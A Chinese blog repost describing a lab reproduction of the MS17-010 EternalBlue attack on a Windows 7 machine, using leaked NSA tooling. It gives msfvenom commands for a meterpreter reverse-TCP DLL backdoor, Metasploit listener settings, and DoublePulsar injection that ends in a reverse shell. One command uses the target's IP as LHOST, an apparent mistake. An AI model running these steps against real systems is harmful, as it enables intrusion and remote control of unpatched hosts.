我是靠谱客的博主 害羞月饼,最近开发中收集的这篇文章主要介绍ms17_010复现use exploit/multi/handlerset payloadwindows/x64/meterpreter/reverse_tcpset lhost 10.1.6.154set lport 5555,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

利用的是NSA爆出来的工具箱
攻击机IP:10.1.6.154
靶机IP :10.1.6.153
靶机系统 : windows7 x64
执行py
设置目标
Target ip : 设置目标 IP 10.1.6.153
Callback IP: 设置本地 IP 10.1.6.154
Use Redirection:设置重定向 no
设置日志目录 : C:logs
设置项目名称
在这里插入图片描述Fb > use eternalblue 选择永恒之蓝模块
在这里插入图片描述
这里的target 指的是目标的操作系统
在这里插入图片描述
然后用kali生成小马,
msfvenom -pwindows/x64/meterpreter/reverse_tcp LHOST=10.1.6.153 LPORT=5555 -f dll >backdoor.dll
在root目录下生成一个backdoor.dll的马, 将马打包 到10.1.6.154这台攻击机上
然后打开smfconsole设置tcp监听
设置监听的命令:

use exploit/multi/handler

set payloadwindows/x64/meterpreter/reverse_tcp

set lhost 10.1.6.154

set lport 5555

使用 use Doublepulsar 模块 向靶机传入小马
生成payload
在这里插入图片描述
选择SMB服务 x64系统 rundll 注入 dll
Dllpayload: 选择dll的路径
攻击成功
攻击成功 返回kali的监听端口上看到反弹到shell

最后

以上就是害羞月饼为你收集整理的ms17_010复现use exploit/multi/handlerset payloadwindows/x64/meterpreter/reverse_tcpset lhost 10.1.6.154set lport 5555的全部内容,希望文章能够帮你解决ms17_010复现use exploit/multi/handlerset payloadwindows/x64/meterpreter/reverse_tcpset lhost 10.1.6.154set lport 5555所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(44)

评论列表共有 0 条评论

立即
投稿
返回
顶部